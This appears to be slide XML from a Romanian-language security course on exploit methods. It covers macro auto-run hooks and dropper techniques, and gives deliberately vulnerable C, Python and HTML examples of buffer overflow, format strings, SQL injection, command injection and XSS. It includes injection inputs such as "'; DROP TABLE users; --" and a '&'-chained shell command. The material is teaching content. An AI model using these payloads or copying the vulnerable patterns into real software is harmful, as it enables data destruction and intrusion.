          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770168" y="4228719"/>
            <a:ext cx="7617006" cy="1147953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296770" y="2511154"/>
            <a:ext cx="2976526" cy="991823"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35324"/>
              <a:gd name="adj2" fmla="val 135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Execuție via shell sau obiectul WScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8688737" y="4738417"/>
            <a:ext cx="2726212" cy="991823"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -152513"/>
              <a:gd name="adj2" fmla="val -1531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Execuție cu funcția WinExec al kernel32 …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3960757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Automatizari</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Proceduri documente macro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B320C6A-E5AA-B706-B99B-3D075023401F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1113182" y="2402237"/>
            <a:ext cx="666406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AutoExec</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> runs when you start Word or load a global template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AutoNew</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> runs each time you create a new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AutoOpen</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> runs each time you open an existing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AutoClose</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> runs each time you close a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AutoExit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> runs when you exit Word or unload a global template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458AA38-E13D-0889-3F22-44DD2CC8609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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34501AEA-6023-899A-1C88-1A2A79457317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1113182" y="4626880"/>
            <a:ext cx="82926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Document_Open</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> runs when a document is opened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Document_Close</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> runs when a document is closed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Document_New</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> runs when a new document based on the template is created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14E00954-1AAC-A6A9-4712-9642A032F975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113182" y="4493196"/>
            <a:ext cx="10164418" cy="9205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449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dropere</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Încorporează un shellcode, îl compilează și îl execută</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Descărca un fișier de pe retea (sau chiar shellcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Decripteaza un fișier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sofisticat: folosește o hartă pentru a prelua caractere din fișierele implicite ale sistemului de operare pentru a construi codul malware pe loc, doar din coordonate și căi ale fișierelor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Dropper despachetează dropper despachetează malware, plasând malware în lanț prin inducție</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Dropper metamorfic, despachetați .cmd, apoi .cmd despachetați .vbs, apoi vbs despachetați .exe și rulați</a:t>
            </a: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189333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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>C.12.4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Metode de exploit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68783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224674"/>
            <a:ext cx="9540240" cy="4045062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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5" name="Flowchart: Process 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1170432" y="3901440"/>
            <a:ext cx="2596896" cy="68884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989251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8998" y="1069857"/>
            <a:ext cx="3751943" cy="4090094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pP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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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void</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vulnerable_function</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char</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str</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char</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buffer</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strcpy</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buffer</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str</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main</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char</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large_input</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20</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"TooLongInputData"</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vulnerable_function</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large_input</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2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5544457" y="868073"/>
            <a:ext cx="6096000" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Debordarea tamponului. În acest exemplu C, vulnerabili_function copiază un șir într-un buffer care este prea mic pentru a-l păstra (strcpy nu verifică lungimea), ceea ce duce la o depășire a tamponului. Acest lucru ar putea suprascrie memoria adiacentă și poate duce la diverse probleme de securitate. Acest exemplu trebuie privit întotdeauna din perspectiva exteriorului mașinii. Și anume, ce se întâmplă dacă „TooLongInputData” vine ca intrare de la o mașină la distanță undeva în altă țară?. Ce se întâmplă dacă acest șir conține cod care permite în final accesul neautorizat de la distanță. Astfel, acestea sunt probleme reale care sunt încă în vigoare din cauza tehnologiilor mai vechi. Acum, pe baza procesului vizat și chiar a ordinii de încărcare a proceselor de pe mașină, se poate crea un șir pentru a invada anumite zone de memorie, care sunt ale aceluiași proces sau alte procese care rulează în paralel cu cel vizat. Evident, acestea sunt niveluri foarte scăzute de înțelegere a hardware-ului mașinii și a sistemului de operare.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2697853061"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5426636" y="6084094"/>
          <a:ext cx="6344449" cy="297180"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6344449">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">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873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stack smashing detected ***: terminated</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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662985" y="6031077"/>
            <a:ext cx="4203971" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tested using: https://www.onlinegdb.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5566228" y="414048"/>
            <a:ext cx="1637628" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Process 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5426636" y="283422"/>
            <a:ext cx="6344450" cy="56629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28610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9314" y="86215"/>
            <a:ext cx="3962400" cy="6671057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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#include &lt;stdio.h&gt;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void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vulnerable_function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char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fopen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"output.txt"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NULL</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perror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"Error opening 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 vulnerable usage:</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fprintf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fclose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printf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"Data written to file.\n"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char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printf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"Enter some text to write to file: "</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fgets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sizeof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stdin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vulnerable_function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5363029" y="680506"/>
            <a:ext cx="6096000" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>O exploatare fprintf. Codul furnizat este un program C care demonstrează o funcție simplă de scriere a intrărilor furnizate de utilizator într-un fișier, dar conține o vulnerabilitate semnificativă. Programul începe cu includerea fișierului standard de antet I/O stdio.h, care este necesar pentru efectuarea operațiunilor de intrare și ieșire în C. Vulnerabil_function este definită să ia un șir (char *user_input) ca argument. În cadrul acestei funcții, încearcă să deschidă un fișier numit „output.txt” în modul de scriere („w”). Dacă fișierul nu poate fi deschis, este tipărit un mesaj de eroare folosind perror, iar funcția revine mai devreme. Acțiunea principală a vulnerabili_function este să scrieți intrarea utilizatorului direct în fișier folosind fprintf. Aici se află vulnerabilitatea. Deoarece funcția scrie direct intrarea utilizatorului în fișier fără nicio validare sau dezinfectare, poate fi exploatată pentru a efectua un atac de securitate cunoscut sub numele de injecție. De exemplu, dacă intrarea utilizatorului include specificatori de format (cum ar fi %s sau %d), ar putea duce la un comportament nedorit. După scrierea intrării în fișier, fișierul este închis folosind fclose. Funcția principală a programului este concepută pentru a colecta informațiile utilizatorului. Declara o matrice de caractere user_data cu o dimensiune de 100 de caractere. Apoi îi solicită utilizatorului să introducă un text, care este citit și stocat în user_data folosind fgets. Această funcție citește intrarea de la intrarea standard (stdin) și o stochează în user_data, asigurându-se că dimensiunea intrării nu depășește dimensiunea matricei. După citirea intrării, main apelează vulnerabili_function, trecând intrarea utilizatorului ca argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="910142748"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5363029" y="5612140"/>
          <a:ext cx="6204857" cy="1059180"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6204857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="144073">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86443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main.c: In function ‘vulnerable_function’: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main.c:10:5: warning: format not a string literal and no format arguments [-Wformat-security]</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10 | fprintf(file, user_input);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Enter some text to write to file: %x %x %x</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Data written to file.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5363029" y="86215"/>
            <a:ext cx="2709653" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Format string vulnerability </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flowchart: Process 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5363029" y="580964"/>
            <a:ext cx="6204857" cy="493163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472863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086" y="354254"/>
            <a:ext cx="4484914" cy="6081408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pP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sqlite3</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unsafe_query</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username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connection to a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 hypothetical database.</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connection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sqlite3</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connect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'example.db'</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cursor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connection</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cursor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construct SQL query via string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 concatenation (unsafe).</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query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"SELECT * FROM users WHERE username = '"</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username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cursor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execute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query</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fetch and print results:</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row</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cursor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fetchall</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row</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cursor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close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connection</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close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unsafe_query</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"alice"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user input that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includes SQL Injection:</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DROP TABLE users;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unsafe_query</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82766643"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4956628" y="6283262"/>
          <a:ext cx="6916057" cy="297180"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6916057">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">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873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Not tested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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5014686" y="427780"/>
            <a:ext cx="6807200" cy="5693866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Un exploit de injecție SQL. Fragmentul de cod de mai sus demonstrează o funcție Python care execută o interogare SQL pe o bază de date SQLite, dar o face într-un mod nesigur, ceea ce o face vulnerabilă la atacurile de injecție SQL. Scriptul începe prin importul bibliotecii sqlite3, care este folosită pentru interacțiunea cu bazele de date SQLite în Python. Apoi definește o funcție numită unsafe_query, care ia un singur argument nume de utilizator. În cadrul acestei funcții, se stabilește o conexiune la o bază de date SQLite numită example.db. Această bază de date este ipotetică și se presupune că există în scopul acestui exemplu. Un obiect cursor este apoi creat folosind metoda connection.cursor(), care este folosită pentru a executa comenzi SQL. Partea potențial periculoasă a funcției este aceea în care construiește o interogare SQL prin concatenarea argumentului nume de utilizator direct în șirul de interogare: „SELECT * FROM users WHERE nume utilizator = '" + nume utilizator + "';". Această abordare este nesigură, deoarece include direct introducerea utilizatorului (nume de utilizator) în comanda SQL fără nicio igienizare sau validare. O astfel de practică lasă baza de date vulnerabilă la injectarea SQL, unde un atacator poate manipula introducerea numelui de utilizator pentru a modifica comportamentul comenzii SQL. Funcția execută apoi interogarea SQL construită folosind cursor.execute(query). Dacă interogarea returnează rezultate, se repetă peste aceste rezultate și imprimă fiecare rând în consolă. După executarea interogării și manipularea rezultatelor, cursorul și conexiunea la baza de date sunt închise folosind cursor.close() și respectiv connection.close(). Se demonstrează că funcția este utilizată de două ori: o dată cu un nume de utilizator normal „alice” și o dată cu un șir de intrare rău intenționat „’; DROP TABLE users; --”. Acesta din urmă este un exemplu de atac de injecție SQL. Punctul și virgulă (;) din intrarea rău intenționată termină interogarea originală, iar comanda DROP TABLE utilizatorilor care urmează este o instrucțiune SQL care, dacă ar fi executată, ar șterge tabelul utilizatori din baza de date. Linia dublă (--) este un simbol de comentariu în SQL, care face din restul interogării un comentariu, neutralizând efectiv orice parte rămasă din interogarea originală.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4891552" y="-15078"/>
            <a:ext cx="1465466" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL injection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flowchart: Process 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956628" y="354254"/>
            <a:ext cx="6916057" cy="576739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75512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2171" y="1248306"/>
            <a:ext cx="4789715" cy="3998531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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ping_host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command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"ping -n 1 "</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"Executing:"</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command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system</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command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test it with a normal input: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ping_host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"8.8.8.8"</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malicious input that creates a text file:</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"8.8.8.8 &amp; echo This is a safe "</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"demonstration of command injection &gt; demo.txt"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ping_host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82593053"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6240288" y="5728494"/>
          <a:ext cx="5450114" cy="601980"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="5450114">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">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873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Executing: ping -n 1 8.8.8.8 &amp; echo This is a safe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demonstration of command injection &gt; demo.txt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sh: 1: ping: not found</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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6821713" y="1514678"/>
            <a:ext cx="4361543" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>O injectare de cod de scriere în fișier. Codul de mai sus este exact ca cele două exemple anterioare de mai sus, cu o diferență și anume în loc de o simplă comandă echo, scriptul scrie acum un mesaj într-un fișier text, ceea ce înseamnă, la rândul său, acces la disc și posibil acces la distanță.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240288" y="505794"/>
            <a:ext cx="1535998" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Process 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240288" y="965199"/>
            <a:ext cx="5414683" cy="457925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80269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220627"/>
            <a:ext cx="6096000" cy="6315703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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DOCTYPE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html</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html</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head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title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XSS</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Demonstration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title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head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body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h2</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XSS</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Test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Page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h2</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script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function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getQueryVariable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variable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var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query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window</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location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search</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substring</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var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vars</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query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split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var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&lt;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vars</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length</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var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pair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vars</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split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pair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variable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pair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false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var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userInput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getQueryVariable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"input"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userInput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use innerHTML to inject the user input into the page:</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document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"User Input: "</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decodeURIComponent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userInput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else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document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"No user input provided."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script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body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&lt;/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html</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45226840"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5214485" y="4493104"/>
          <a:ext cx="6298520" cy="1668693"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6298520">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="15872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509968">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pic>
        <p:nvPicPr>
          <p:cNvPr id="5121" name="Picture 87" descr="Capturdfdfd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7825" y="4753202"/>
            <a:ext cx="4629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54400" y="422672"/>
            <a:ext cx="6096000" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
